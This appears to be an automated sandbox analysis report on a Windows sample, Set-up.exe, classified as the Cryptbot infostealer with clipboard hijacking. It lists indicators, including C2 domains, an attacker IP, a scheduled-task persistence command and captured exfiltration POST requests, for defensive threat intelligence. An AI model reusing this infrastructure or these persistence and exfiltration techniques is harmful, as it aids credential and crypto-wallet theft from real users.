Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1522675
MD5:	fb481c39ea41b8bd7743bf3a9d730e76
SHA1:	57fb93e92efa53e80fb196d5fbb3717783c54809
SHA256:	ec23c516e7dcc1783530369419e6ce7333a228f4e5209216d70e8489048e3ab4
Tags:	exeuser-4k95m
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 4816 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: FB481C39EA41B8BD7743BF3A9D730E76)

service123.exe (PID: 5440 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 6959DF077AFAD94D152558F4AAE964E4)

schtasks.exe (PID: 3780 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 5844 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 6959DF077AFAD94D152558F4AAE964E4)

service123.exe (PID: 2452 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 6959DF077AFAD94D152558F4AAE964E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["upload.phps.top", "s.top", "@twelvevx12vs.top", "+twelvevx12vs.top", "LRPCtwelvevx12vs.top", "twelvevx12vs.top", "analforeverlovyu.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2649593570.000000000451B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 4816	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 4816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 4816	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 5440	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c340000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 4816, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 3780, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T15:17:13.955738+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49704	84.38.182.221	80	TCP
2024-09-30T15:17:17.635225+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49706	84.38.182.221	80	TCP
2024-09-30T15:17:22.491886+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49712	84.38.182.221	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.4816.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["upload.phps.top", "s.top", "@twelvevx12vs.top", "+twelvevx12vs.top", "LRPCtwelvevx12vs.top", "twelvevx12vs.top", "analforeverlovyu.top"]}

Multi AV Scanner detection for domain / URL

Source: https://serviceupdate32.com/update

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for submitted file

Source: Set-up.exe	ReversingLabs: Detection: 28%
Source: Set-up.exe	Virustotal: Detection: 35%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_000115B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_000115B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C3414B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_000181E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C360860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C36A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C41F960h	5_2_6C35EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C364453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C3E84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C36C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C36A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6C3E0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C360740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6C39A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C360260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C41D014h]	5_2_6C414360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C3B7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C3B3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C36D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C399B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C37BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C37BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C3BB4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C36D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6C3B9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C36D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C41DFF4h	5_2_6C3B3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C36D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C3E3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C35B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C36D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C3D7350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49704 -> 84.38.182.221:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49706 -> 84.38.182.221:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49712 -> 84.38.182.221:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: upload.phps.top
Source: Malware configuration extractor	URLs: s.top
Source: Malware configuration extractor	URLs: @twelvevx12vs.top
Source: Malware configuration extractor	URLs: +twelvevx12vs.top
Source: Malware configuration extractor	URLs: LRPCtwelvevx12vs.top
Source: Malware configuration extractor	URLs: twelvevx12vs.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top

Source: Joe Sandbox View

IP Address: 84.38.182.221 84.38.182.221

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41476359User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: twelvevx12vs.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary68176922User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 75959Host: twelvevx12vs.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70233283User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30029Host: twelvevx12vs.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: twelvevx12vs.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary41476359User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: twelvevx12vs.top

Source: Set-up.exe, Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2185018616.0000000001978000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/?
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/G
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/O
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/d
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twelvevx12vs.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_6C359C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C359C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C359D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C359D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C359E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_6C359E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_000151B0	5_2_000151B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00013E20	5_2_00013E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C382CCE	5_2_6C382CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C34CD00	5_2_6C34CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C34EE50	5_2_6C34EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C350FC0	5_2_6C350FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C390AC0	5_2_6C390AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3544F0	5_2_6C3544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3846E0	5_2_6C3846E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3807D0	5_2_6C3807D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3787C0	5_2_6C3787C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C390060	5_2_6C390060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C382090	5_2_6C382090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C372360	5_2_6C372360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C39DC70	5_2_6C39DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C355880	5_2_6C355880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3798F0	5_2_6C3798F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C387A20	5_2_6C387A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38DBEE	5_2_6C38DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38140E	5_2_6C38140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C391510	5_2_6C391510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38F610	5_2_6C38F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C36F760	5_2_6C36F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C343000	5_2_6C343000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C4050D0	5_2_6C4050D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3570C0	5_2_6C3570C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C40ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C413820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C4136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C413B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C415A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C413560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C415980 appears 83 times

Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\kLjWvVQjXk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\fwFEVxyGBFjyQWNlspqq

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.2195576685.0000000003AB8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe	ReversingLabs: Detection: 28%
Source: Set-up.exe	Virustotal: Detection: 35%

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
